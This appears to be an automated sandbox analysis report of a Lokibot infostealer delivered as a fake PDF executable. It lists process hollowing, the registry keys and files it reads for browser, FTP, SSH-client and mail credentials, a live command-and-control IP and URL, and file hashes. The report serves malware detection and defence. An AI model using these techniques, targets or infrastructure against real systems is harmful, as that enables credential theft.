Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	API call chain: ExitProcess graph end node			graph_0-3605

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe

Code function: 6_2_028685CC Sleep,LdrInitializeThunk,NtProtectVirtualMemory,

6_2_028685CC

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Sample uses process hollowing technique

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Section unmapped: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe base address: 400000

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe base: 1660000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe base: 19FFF4			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe "C:\Users\user\AppData\Local\Temp\Slringsnettets.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe

Code function: 0_2_00405D1B GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

0_2_00405D1B

Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000006.00000002.2902321188.00000000032F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Slringsnettets.exe PID: 2212, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Remote Access Functionality

Yara detected Lokibot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000006.00000002.2902321188.00000000032F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Slringsnettets.exe PID: 2212, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Software Packing	2 OS Credential Dumping	3 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Shared Modules	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 DLL Side-Loading	1 Credentials in Registry	116 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 PowerShell	Logon Script (Windows)	211 Process Injection	1 Masquerading	Security Account Manager	211 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	41 Virtualization/Sandbox Evasion	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Access Token Manipulation	LSA Secrets	41 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	211 Process Injection	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	24%	ReversingLabs
PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	23%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	24%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Slringsnettets.exe	23%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\nst5070.tmp\BgImage.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nst5070.tmp\BgImage.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\nst5070.tmp\nsDialogs.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nst5070.tmp\nsDialogs.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\nst5070.tmp\nsExec.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nst5070.tmp\nsExec.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Roaming\188E93\31437F.exe (copy)	24%	ReversingLabs
C:\Users\user\AppData\Roaming\188E93\31437F.exe (copy)	23%	Virustotal	Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
drive.google.com	0%	Virustotal		Browse
drive.usercontent.google.com	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://api.w.org/	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://nsis.sf.net/NSIS_ErrorError	0%	URL Reputation	safe
http://nsis.sf.net/NSIS_Error	0%	URL Reputation	safe
https://aka.ms/pscore6lB	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://apis.google.com	0%	URL Reputation	safe
http://45.61.136.239/index.php/feed/	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://www.ftp.ftp://ftp.gopher.	0%	Avira URL Cloud	safe
https://drive.usercontent.google.com/	0%	Avira URL Cloud	safe
http://45.61.136.239/index.php/wp-json/	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe
https://www.google.com	0%	Avira URL Cloud	safe
http://45.61.136.239/index.php/wp-json/	7%	Virustotal		Browse
https://drive.usercontent.google.com/	1%	Virustotal		Browse
https://www.google.com	0%	Virustotal		Browse
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	0%	Avira URL Cloud	safe
https://drive.google.com/	1%	Virustotal		Browse
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	0%	Virustotal		Browse
https://github.com/Pester/Pester	1%	Virustotal		Browse
https://drive.google.com/	0%	Avira URL Cloud	safe
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	0%	Virustotal		Browse
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	0%	Avira URL Cloud	safe
https://drive.google.com/.	0%	Avira URL Cloud	safe
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	0%	Avira URL Cloud	safe
http://45.61.136.239/index.php/comments/feed/	0%	Avira URL Cloud	safe
http://45.61.136.239/index.php/feed/	7%	Virustotal		Browse
http://45.61.136.239/index.php/posts.php?file=1951649854775	100%	Avira URL Cloud	malware
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	0%	Virustotal		Browse
https://drive.google.com/.	1%	Virustotal		Browse
http://45.61.136.239/index.php/comments/feed/	7%	Virustotal		Browse
http://45.61.136.239/index.php/posts.php?file=1951649854775	7%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
drive.google.com	216.58.212.142	true	false	0%, Virustotal, Browse	unknown
drive.usercontent.google.com	142.250.185.97	true	false	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://45.61.136.239/index.php/posts.php?file=1951649854775	true	7%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.2132245200.0000000005D69000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000001.00000002.2129183138.0000000004E56000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000001.00000002.2129183138.0000000004E56000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000001.00000002.2132245200.0000000005D69000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.w.org/	Slringsnettets.exe, 00000006.00000002.2902321188.0000000003288000.00000004.00000020.00020000.00000000.sdmp, Slringsnettets.exe, 00000006.00000002.2902321188.00000000032C6000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000001.00000002.2132245200.0000000005D69000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.ftp.ftp://ftp.gopher.	Slringsnettets.exe, 00000006.00000001.2057003193.0000000000649000.00000020.00000001.01000000.0000000C.sdmp	false	Avira URL Cloud: safe	unknown
https://drive.usercontent.google.com/	Slringsnettets.exe, 00000006.00000003.2121700313.00000000032FA000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://45.61.136.239/index.php/feed/	Slringsnettets.exe, 00000006.00000002.2902321188.0000000003288000.00000004.00000020.00020000.00000000.sdmp, Slringsnettets.exe, 00000006.00000002.2902321188.00000000032C6000.00000004.00000020.00020000.00000000.sdmp, Slringsnettets.exe, 00000006.00000002.2902321188.00000000032F0000.00000004.00000020.00020000.00000000.sdmp	false	7%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	PTFE Coated Butterfly Valve Picture#U00b7pdf.exe, Slringsnettets.exe.1.dr	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000001.00000002.2129183138.0000000004E56000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://45.61.136.239/index.php/wp-json/	Slringsnettets.exe, 00000006.00000002.2902321188.0000000003288000.00000004.00000020.00020000.00000000.sdmp, Slringsnettets.exe, 00000006.00000002.2902321188.00000000032C6000.00000004.00000020.00020000.00000000.sdmp	false	7%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com	Slringsnettets.exe, 00000006.00000003.2105018546.00000000032FA000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	Slringsnettets.exe, 00000006.00000001.2057003193.00000000005F2000.00000020.00000001.01000000.0000000C.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_Error	PTFE Coated Butterfly Valve Picture#U00b7pdf.exe, Slringsnettets.exe.1.dr	false	URL Reputation: safe	unknown
https://aka.ms/pscore6lB	powershell.exe, 00000001.00000002.2129183138.0000000004D01000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://drive.google.com/	Slringsnettets.exe, 00000006.00000002.2902321188.0000000003288000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000001.00000002.2132245200.0000000005D69000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.2132245200.0000000005D69000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	Slringsnettets.exe, 00000006.00000001.2057003193.0000000000649000.00000020.00000001.01000000.0000000C.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	Slringsnettets.exe, 00000006.00000001.2057003193.00000000005F2000.00000020.00000001.01000000.0000000C.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://drive.google.com/.	Slringsnettets.exe, 00000006.00000002.2902321188.0000000003288000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://apis.google.com	Slringsnettets.exe, 00000006.00000003.2105018546.00000000032FA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://45.61.136.239/index.php/comments/feed/	Slringsnettets.exe, 00000006.00000002.2902321188.0000000003288000.00000004.00000020.00020000.00000000.sdmp, Slringsnettets.exe, 00000006.00000002.2902321188.00000000032C6000.00000004.00000020.00020000.00000000.sdmp, Slringsnettets.exe, 00000006.00000002.2902321188.00000000032F0000.00000004.00000020.00020000.00000000.sdmp	false	7%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.2129183138.0000000004D01000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
216.58.212.142	drive.google.com	United States	15169	GOOGLEUS	false
45.61.136.239	unknown	United States	40676	AS40676US	true
142.250.185.97	drive.usercontent.google.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1467418
Start date and time:	2024-07-04 08:21:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PTFE Coated Butterfly Valve Picture#U00b7pdf.exe renamed because original name is a hash value
Original Sample Name:	PTFE Coated Butterfly Valve Picturepdf.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/23@2/3
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 94% Number of executed functions: 92 Number of non-executed functions: 40
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 5316 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:22:01	API Interceptor	35x Sleep call for process: powershell.exe modified
02:22:57	API Interceptor	20x Sleep call for process: Slringsnettets.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
45.61.136.239	M160241530046520.cmd.exe	Get hash	malicious	Lokibot	Browse	45.61.136.239/index.php/gyr.php?id=1
	BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe	Get hash	malicious	GuLoader, Lokibot	Browse	45.61.136.239/index.php/54596186971079
	RFQ KTH02-07-2024#U00b7pdf.exe	Get hash	malicious	GuLoader, Lokibot	Browse	45.61.136.239/index.php/posts.php?file=1951649854775
	Obavestenje o deviznom prilivu.Pdf.cmd.exe	Get hash	malicious	Lokibot	Browse	45.61.136.239/index.php/gyr.php?id=1
	Purchase Order 02.07.2024.PDF.cmd.exe	Get hash	malicious	Lokibot	Browse	45.61.136.239/index.php/gyr.php?id=1
	SeAH RFP_24-0676#U00b7pdf.exe	Get hash	malicious	GuLoader, Lokibot	Browse	45.61.136.239/index.php/ajax.php?view=1
	UTN RFP_24-0676#U00b7pdf.exe	Get hash	malicious	GuLoader, Lokibot	Browse	45.61.136.239/index.php/ajax.php?view=1
	PLANT PROJECT PROPOSAL BID_24-0676#U00b7pdf.exe	Get hash	malicious	GuLoader, Lokibot	Browse	45.61.136.239/index.php/posts?post=3046046175911
	Document BT24#U00b7pdf.exe	Get hash	malicious	GuLoader, Lokibot	Browse	45.61.136.239/index.php/54596186971079
	Quote Request (Tupy S.A.) 523AM - 924BR#U00b7pdf.exe	Get hash	malicious	GuLoader, Lokibot	Browse	45.61.136.239/index.php/posts.php?file=1951649854775

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS40676US	M160241530046520.cmd.exe	Get hash	malicious	Lokibot	Browse	45.61.136.239
	BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe	Get hash	malicious	GuLoader, Lokibot	Browse	45.61.136.239
	RFQ KTH02-07-2024#U00b7pdf.exe	Get hash	malicious	GuLoader, Lokibot	Browse	45.61.136.239
	#Inv_PI29467018.pdf.vbs	Get hash	malicious	Unknown	Browse	41.216.183.13
	Obavestenje o deviznom prilivu.Pdf.cmd.exe	Get hash	malicious	Lokibot	Browse	45.61.136.239
	Purchase Order 02.07.2024.PDF.cmd.exe	Get hash	malicious	Lokibot	Browse	45.61.136.239
	orden de compra.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	41.216.183.13
	FedEx Receipt_53065724643.xls	Get hash	malicious	FormBook	Browse	41.216.183.13
	statement .xls	Get hash	malicious	Unknown	Browse	41.216.183.13
	Lu4qSit8YR.elf	Get hash	malicious	Unknown	Browse	172.107.78.124

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	Revised PI_2024.exe	Get hash	malicious	GuLoader	Browse	216.58.212.142 142.250.185.97
	SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Get hash	malicious	Poverty Stealer	Browse	216.58.212.142 142.250.185.97
	file.exe	Get hash	malicious	GuLoader, Remcos	Browse	216.58.212.142 142.250.185.97
	file.exe	Get hash	malicious	Vidar	Browse	216.58.212.142 142.250.185.97
	d8gZVaN0ms.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, Stealc, Vidar	Browse	216.58.212.142 142.250.185.97
	1dntbjwU2s.exe	Get hash	malicious	CryptOne, Vidar	Browse	216.58.212.142 142.250.185.97
	XZ50BK5JPZ.exe	Get hash	malicious	CryptOne, Vidar	Browse	216.58.212.142 142.250.185.97
	BomqT2a55e.exe	Get hash	malicious	AgentTesla	Browse	216.58.212.142 142.250.185.97
	eXiJWkp8OE.exe	Get hash	malicious	GuLoader	Browse	216.58.212.142 142.250.185.97
	MzjwuZnJF0.exe	Get hash	malicious	GuLoader	Browse	216.58.212.142 142.250.185.97

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nst5070.tmp\BgImage.dll	bPYR660y5o.exe	Get hash	malicious	Azorult, GuLoader	Browse
	uQP25xP5DH.exe	Get hash	malicious	GuLoader	Browse
	bPYR660y5o.exe	Get hash	malicious	GuLoader	Browse
	uQP25xP5DH.exe	Get hash	malicious	GuLoader	Browse
	R7MPO3ijgz.exe	Get hash	malicious	GuLoader	Browse
	tNET06vnWS.exe	Get hash	malicious	GuLoader	Browse
	R7MPO3ijgz.exe	Get hash	malicious	GuLoader	Browse
	0bRKaeNvVp.exe	Get hash	malicious	GuLoader	Browse
	tNET06vnWS.exe	Get hash	malicious	GuLoader	Browse
	u1m7a5SI1g.exe	Get hash	malicious	GuLoader	Browse
C:\Users\user\AppData\Local\Temp\nst5070.tmp\nsDialogs.dll	bPYR660y5o.exe	Get hash	malicious	Azorult, GuLoader	Browse
	uQP25xP5DH.exe	Get hash	malicious	GuLoader	Browse
	bPYR660y5o.exe	Get hash	malicious	GuLoader	Browse
	uQP25xP5DH.exe	Get hash	malicious	GuLoader	Browse
	R7MPO3ijgz.exe	Get hash	malicious	GuLoader	Browse
	tNET06vnWS.exe	Get hash	malicious	GuLoader	Browse
	R7MPO3ijgz.exe	Get hash	malicious	GuLoader	Browse
	0bRKaeNvVp.exe	Get hash	malicious	GuLoader	Browse
	tNET06vnWS.exe	Get hash	malicious	GuLoader	Browse
	u1m7a5SI1g.exe	Get hash	malicious	GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	8003
Entropy (8bit):	4.840877972214509
Encrypted:	false
SSDEEP:	192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
MD5:	106D01F562D751E62B702803895E93E0
SHA1:	CBF19C2392BDFA8C2209F8534616CCA08EE01A92
SHA-256:	6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
SHA-512:	81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\Donkraftes197.sax

Download File

Process:	C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	3241
Entropy (8bit):	4.944775379574013
Encrypted:	false
SSDEEP:	96:Q2ftN1sEMoxZkH07swucpg4PJAbZknQgEYmC:Q25sVoxZkU7swjJAbKr
MD5:	FFBF267C60266B56038D6F59A29667FE
SHA1:	6670DCFB19C1F662EEBB962C5C893E26BFDC6A3A
SHA-256:	92746E6CF37B022C9E65F638325D9A260109F8AD1CEFDCD9179023A8C43854BD
